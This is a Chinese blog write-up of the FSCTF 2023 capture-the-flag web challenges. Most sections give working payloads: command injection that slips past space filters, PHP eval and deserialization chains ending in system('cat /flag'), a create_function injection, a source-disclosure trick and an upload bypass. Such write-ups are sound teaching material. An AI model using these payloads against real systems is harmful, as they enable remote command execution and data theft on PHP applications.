FSCTF 2023-WEB部分wp

已于 2023-10-29 17:07:11 修改
阅读量719 收藏 5
点赞数 2
文章标签: web安全 php
于 2023-10-28 14:22:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74606212/article/details/134090100
版权

目录

源码!启动!  

webshell是啥捏

细狗2.0

Hello,you

EZ_eval

ez_php1

巴巴托斯! 

ez_php2

寻找蛛丝马迹

CanCanNeed

签到plus

是兄弟,就来传你の🐎! 

源码!启动!  

这里打开开发人员工具,查看源代码

webshell是啥捏

前面表情包解释为passthru 

passthru — 执行外部程序并且显示原始输出

说明

passthru(string $command, int &$result_code = null): ?false

exec() 函数类似, passthru() 函数 也是用来执行外部命令(command)的。 当所执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec()system() 函数。 常用来执行诸如 pbmplus 之类的可以直接输出图像流的命令。 通过设置 Content-type 为 image/gif, 然后调用 pbmplus 程序输出 gif 文件, 就可以从 PHP 脚本中直接输出图像到浏览器。

 这里就可以直接ls查看了

细狗2.0

 过滤了空格

127.0.0.1;ls${IFS}$9/

127.0.0.1;ca\t${IFS}$9/f*

Hello,you

127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

EZ_eval

 源代码:

<?php
    if(isset($_GET['word'])){
    $word = $_GET['word'];
    if (preg_match("/cat|tac|tail|more|head|nl|flag|less| /", $word)){
       die("nonono.");
    }
    $word = str_replace("?", "", $word);
    eval("?>". $word);
}else{
    highlight_file(__FILE__);
}

这里过滤了 cat、tac、tail、more、head、nl、flag、less 和空格,并且删除?

在 eval 中加入了 php 闭合符就说明前面的 eval 被闭合已经不能用了

这道题既然过滤了问号那么就不能使用<?php ?>、<?= ?>和<? ?>

那么就还剩一个 <script language='php'> </script>

其中关于读取命令可以使用 ta\c 或者 ta""c 来绕过过滤 空格用%09 flag 用通配符

最终 payload 如下

?word=<script%09language='php'>system('ta\c%09/f*');</script>

ez_php1

<?php
highlight_file(__FILE__);
error_reporting(0);
include "globals.php";
$a = $_GET['b'];
$b = $_GET['a'];
if($a!=$b&&md5($a)==md5($b))
{
    echo "!!!";
    $c = $_POST['FL_AG'];
    if(isset($c))
    {
        if (preg_match('/^.*(flag).*$/', $ja)) {
            echo 'You are bad guy!!!';
        }
            else {
                echo "Congratulation!!";
                echo $hint1;
            }
    }
    else {
        echo "Please input my love FL_AG";
    }
} else{
    die("game over!");
}
?>

访问L0vey0U.php

 访问P0int.php

源代码:

<?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?>

这里直接使用引用输出a即可

payload:

<?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
$a=new Clazz();
$a->b=&$a->a;
echo serialize($a);


?> 
data=O:5:"Clazz":2:{s:1:"a";N;s:1:"b";R:2;}

巴巴托斯! 

这里提示了FSCTF Brower

修改User-Agent

 Referer:127.0.0.1

直接伪协议

 

ez_php2

源代码:

 <?php
highlight_file(__file__);
Class Rd{
    public $ending;
    public $cl;

    public $poc;
    public function __destruct()
    {
        echo "All matters have concluded";
        die($this->ending);
    }
    public function __call($name, $arg)
    {
        foreach ($arg as $key =>$value)
        {

            if($arg[0]['POC']=="1111")
            {
                echo "1";
                $this->cl->var1 = "system";
            }
        }
    }
}


class Poc{
    public $payload;

    public $fun;

    public function __set($name, $value)
    {
        $this->payload = $name;
        $this->fun = $value;
    }

    function getflag($paylaod)
    {
        echo "Have you genuinely accomplished what you set out to do?";
        file_get_contents($paylaod);
    }
}

class Er{
    public $symbol;
    public $Flag;

    public function __construct()
    {
        $this->symbol = True;
    }

    public function __set($name, $value)
    {
        $value($this->Flag);
    }


}

class Ha{
    public $start;
    public $start1;
    public $start2;
    public function __construct()
    {
        echo $this->start1."__construct"."</br>";
    }

    public function __destruct()
    {
        if($this->start2==="11111") {
            $this->start1->Love($this->start);
            echo "You are Good!";
        }
    }
}


if(isset($_GET['Ha_rde_r']))
{
    unserialize($_GET['Ha_rde_r']);
} else{
    die("You are Silly goose!");
}
?>

payload:

<?php
highlight_file(__file__);
Class Rd{
    public $ending;
    public $cl;

    public $poc;
}


class Poc{
    public $payload;

    public $fun;
}

class Er{
    public $symbol;
    public $Flag='ls /';

}

class Ha{
    public $start;
    public $start1;
    public $start2="11111";
}

$a=new Ha();
$a->start1=new Rd();
$a->start=['POC'=>'1111'];
$a->start1->cl=new Er();
echo serialize($a);
?>
?Ha_rde_r=O:2:"Ha":3:{s:5:"start";a:1:{s:3:"POC";s:4:"1111";}s:6:"start1";O:2:"Rd":3:{s:6:"ending";N;s:2:"cl";O:2:"Er":2:{s:6:"symbol";N;s:4:"Flag";s:4:"ls /";}s:3:"poc";N;}s:6:"start2";s:5:"11111";}

把Flag的值改为cat  /flag

?Ha_rde_r=O:2:"Ha":3:{s:5:"start";a:1:{s:3:"POC";s:4:"1111";}s:6:"start1";O:2:"Rd":3:{s:6:"ending";N;s:2:"cl";O:2:"Er":2:{s:6:"symbol";N;s:4:"Flag";s:9:"cat /flag";}s:3:"poc";N;}s:6:"start2";s:5:"11111";}

 

寻找蛛丝马迹

 

这里用火狐修复文字编码即可 

 和苹果有点关系联想到.DS_store

 

 

payload:

FSCTF{Tell_y0U_noT_To_poInT_oUt_tH@t_y000u_Don't_believe_it!}

CanCanNeed

源代码:

<?php
class Noteasy{
    protected $param1;
    protected $param2;
    
    function __destruct(){
        $a=$this->param1;
        $b=$this->param2;
        if(preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) { 
            die('this param is error!'); 
        } else { 
            $a('', $b); 
        }
    }
    
}
if (!isset($_GET['file'])){    
    show_source('index.php');
    echo "Hi!Welcome to FSCTF2023!";
  }
  else{ 
    $file=base64_decode($_GET['file']); 
    unserialize($file); }
?>

分析源码,对传入的 file 参数 base64 解码后反序列化,__destruct 函数中出现了 $a(‘’, $b); ,且 $a 和 $b 可通过 $param1 和 $param2 进行控制。
再观察正则表达式,发现没有过滤 system 和中括号,所以可以使用 system 执行 shell 命令,获取 flag。
所以将 $param1 设置为 create_function ,$param2 设置为 system($_GET[1])

payload:

<?php

class Noteasy
{
    protected $param1 = "create_function";
    protected $param2 = "};system(\$_POST[1]);//";

    function __destruct()
    {
        $a = $this->param1;
        $b = $this->param2;
        if (preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) {
            die('this param is error!');
        } else {
            $a('', $b);
        }
    }
}

$n = new Noteasy();
echo(base64_encode(serialize($n)));
?file=Tzo3OiJOb3RlYXN5IjoyOntzOjk6IgAqAHBhcmFtMSI7czoxNToiY3JlYXRlX2Z1bmN0aW9uIjtzOjk6IgAqAHBhcmFtMiI7czoyMjoifTtzeXN0ZW0oJF9QT1NUWzFdKTsvLyI7fQ==

 POST传参

1=ls /
1=cat /f*

签到plus

打比赛时有提示扫一下

那我们就扫一下下

 中国人不骗中国人

访问一下

这个flag是假的,我收回上面说的话

看了一下提示,发现是

php7.4.21的文件泄露

PHP<=7.4.21 Development Server源码泄露漏洞_这周末在做梦的博客-CSDN博客

抓包一下修改看看

copy to file

HTTP/0.9 200 OK
Host: node4.anna.nssctf.cn:28201
Date: Sun, 29 Oct 2023 08:53:09 GMT
Connection: close
Content-Length: 443

<?php
phpinfo();
$😀="a";
$😁="b";
$😂="c";
$🤣="d";
$😃="e";
$😄="f";
$😅="g";
$😆="h";
$😉="i";
$😊="j";
$😋="k";
$😎="l";
$😍="m";
$😘="n";
$😗="o";
$😙="p";
$😚="q";
$🙂="r";
$🤗="s";
$🤩="t";
$🤔="u";
$🤨="v";
$😐="w";
$😑="x";
$😶="y";
$🙄="z";

$😭 = $😙. $😀. $🤗. $🤗. $🤩. $😆. $🙂. $🤔;

if (isset($_GET['👽🦐'])) {
    eval($😭($_GET['👽🦐']));
};

?>

payload:

?👽🦐=ls /

?👽🦐=cat /f*

是兄弟,就来传你の🐎! 

先传几个试试,发现pht没有被过滤 

 但又限制了长度

 看别的师傅的wp,新的思路

利用BM头和php中的反引号直接读取flag。

BM<?=`cat /*`;

成功 

 

orzw
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web-stories-wp:WordPress的网络故事
02-05
WordPress的网络故事 WordPress的视觉讲故事。 建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接从WordPress管理仪表板安装WordPress或从手动下载插件,将Web Stories用于WordPress。 支持 如果发现任何问题,请访问以提出任何问题或提出文件功能要求。 贡献 我们很乐意接受您对该项目的补丁和贡献。 您只需要遵循一些小指导。 请查看我们的和《指南》。 产品规格
all-in-one-wp-migration-file-extension.zip
04-07
all-in-one-migration的扩展插件,可以备份更大内存的wordpress站点,500m
FSCTF2023 wp
HvAng10的博客
11-30 1029
看上去很复杂,根据c的位数以及flag的位数,e=3,小明文攻击,我们直接对c开3次方即可,一开始还真没看出来,傻傻的在想。这里考察到了兔子流密码的认识,它类似于base64编码的组成,可能以=结尾,最大的特征为,以U2FsdGVkX1开头!这里考察到了兔子流密码的认识,它类似于base64编码的组成,可能以=结尾,最大的特征为,以U2FsdGVkX1开头!>闭合,此时我们需输入<?emmm,没时间打,赛后自己做了一部分,跟wp复现了一部分。埃塞克,即ASCII,此处的ROT,我们试出是ROT47。
[FSCTF 2023] web题解
rev1ve的博客
10-26 1006
分析一下,就是简单的MD5绕过和php解析特性。php中变量与变量之间用点号连接表示拼接。直接ctrl+u查看源码得到flag。题目拼接结果为passthru。打开题目,发现右键被禁了。
[FSCTF 2023]加速加速已解决
XXokok的博客
10-26 446
[FSCTF 2023]加速加速已解决
[FSCTF 2023]是兄弟,就来传你の!已解决
XXokok的博客
10-29 323
文件头绕过,文件内容类型绕过,
WPFSCTF 2023 WEB
m0_63138919的博客
10-24 890
本文为FSCTF 2023 web题解 供大家学习 有哪里不懂的或者有问题可以指出哦
风生云遏,水尽潭清 1.5
2301_79933084的博客
12-05 387
这是一篇周报至于作者为什么取了一个字字相矛盾、词词相悖论的一个名字,竟然还用来做标题……我也不知道,可能因为他这个人就很怪吧复现学习。
[FSCTF 2023]ez_php2 WP
SmillPig的博客
12-17 167
传参请求,拿到flag。
[FSCTF 2023]ez_php1已解决
XXokok的博客
10-24 464
[FSCTF 2023]ez_php1已解决
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
CtfHub-wpweb
01-23
ctfhub平台webwp
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
FSCTF 2023(公开赛道)(pwn持续更新中)
沈理大学牲的博客
11-28 515
file一下,64位,ida打开关键函数部分:检查用户输入的命令中是否包含"cat"、"flag"、"sh"或者"$0"这些关键词,如果包含,则输出"invalid command";否则关闭标准输出,然后调用backdoor函数。在backdoor函数中system(a1);存在,a1是buf也就是输入的我也是看了wp才知道的,还得多练直接 nc node4.anna.nssctf.cn 28229然后输入 tac fla* >&2。
【刷题日志3.4--3.10】
qq_74240553的博客
03-06 872
ctf
2023FSCTF--writrup -- by Crypto0
qq_69956003的博客
10-24 722
FSCTF2023
FSCTF 2023部分题目复盘(思路简易版)
sjcjfkdj的博客
11-08 349
部分题目wp参照某些大佬的,我只是从自己的角度略微总结了一下方法,只提供思路,具体自己复现或者参照其他大佬的wp我只是啥也不会的菜狗,别骂了别骂了。
全面升级企业网络安全 迈入SASE新时代
最新发布
HKT香港电讯的博客
05-08 1038
随着数字化业务、云计算、物联网和人工智能等技术的飞速发展,企业的业务部署环境日渐多样化,远程移动设备办公模式的普及,企业多分支机构的加速设立,也使得企业业务系统的用户范围由单一、单点的内部用户扩展至多个分支及多个外部终端,企业数据暴露在互联网中存在安全威胁基于企业运营据点分散化的趋势,越来越多的企业数据暴露在互联网中,网络安全问题层出不穷。企业用户在访问海外互联网时,经常会有不法分子利用不同国家和地区的网络安全环境存在的差异进行网络攻击。
web安全day03
lsswyy的博客
05-08 563
MYSQL注入: SQL 注入的原理、危害及防御措施 SQL 注入的原理:原本的 SQL 语句在与用户可控的参数经过了如拼接、替换等字符串操作后,得到一个新的 SQL 语句并被数据库解析执行,从而达到非预期的效果。 SQL 注入的危害:由于 SQL 注入是执行了非预期的 SQL 语句,所以有可能导致数据库中的大量数据泄露、甚至被删库,如果数据库开启了文件读写权限,还有可能导致服务器被写入木马等。 SQL 注入的防御:SQL 注入的防御一般从三个方向开展: 信息收集 集成安
功能安全-阶段-wp6
11-25
WP6是功能安全的阶段之一,根据ISO 26262标准的要求,WP6主要用于实施功能安全的验证和确认,以确保系统能够达到确定的安全性要求。 WP6包括以下主要任务和活动: 1. 验证计划:根据系统的功能安全要求,制定验证计划,明确验证的目标、方法和资源需求等。 2. 验证环境准备:准备符合验证目标和方法要求的环境,包括硬件、软件、工具等。 3. 验证过程执行:根据验证计划执行验证活动,包括对系统的功能和安全特性进行测试、仿真、模拟等。 4. 验证结果分析:对验证过程中得到的数据和结果进行分析和评估,判断系统是否符合功能安全要求。 5. 验证报告编写:根据验证结果编写详细的验证报告,记录验证过程、结果和评估。 6. 不符合项处理:对于发现的不符合功能安全要求的问题,进行问题跟踪和解决,确保系统能够满足要求。 通过WP6阶段的活动和任务,可以对系统的功能安全进行验证和确认,以确保系统能够在意外事件发生时保持安全的状态或转换到安全状态。同时,WP6阶段还可以为后续的功能安全确认活动提供必要的数据和信息,为系统的功能安全性评估提供支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值